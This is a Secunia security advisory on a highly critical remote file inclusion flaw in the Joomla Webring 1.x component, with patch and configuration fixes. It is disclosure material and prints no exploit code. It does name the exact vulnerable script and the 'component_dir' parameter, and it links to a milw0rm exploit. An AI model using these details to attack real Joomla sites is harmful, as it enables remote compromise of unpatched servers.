Joomla Webring Component "component_dir" File Inclusion

SECUNIA ADVISORY ID:
SA21495

VERIFY ADVISORY:
http://secunia.com/advisories/21495/

CRITICAL:
Highly critical

IMPACT:
System access

WHERE:
>From remote

SOFTWARE:
Webring 1.x (component for Joomla)
http://secunia.com/product/11410/

DESCRIPTION:
xoron has discovered a vulnerability in the Webring component for
Joomla, which can be exploited by malicious people to compromise a
vulnerable system.

Input passed to the "component_dir" parameter in
administrator/components/com_webring/admin.webring.docs.php isn't
properly verified, before it is used to include files. This can be
exploited to include arbitrary files from external and local
resources.

Successful exploitation requires that "register_globals" is enabled.

The vulnerability has been confirmed in version 1.0. Other versions
may also be affected.

SOLUTION:
Edit the source code to ensure that input is properly verified.

Set "register_globals" to "Off".

PROVIDED AND/OR DISCOVERED BY:
xoron

ORIGINAL ADVISORY:
http://milw0rm.com/exploits/2177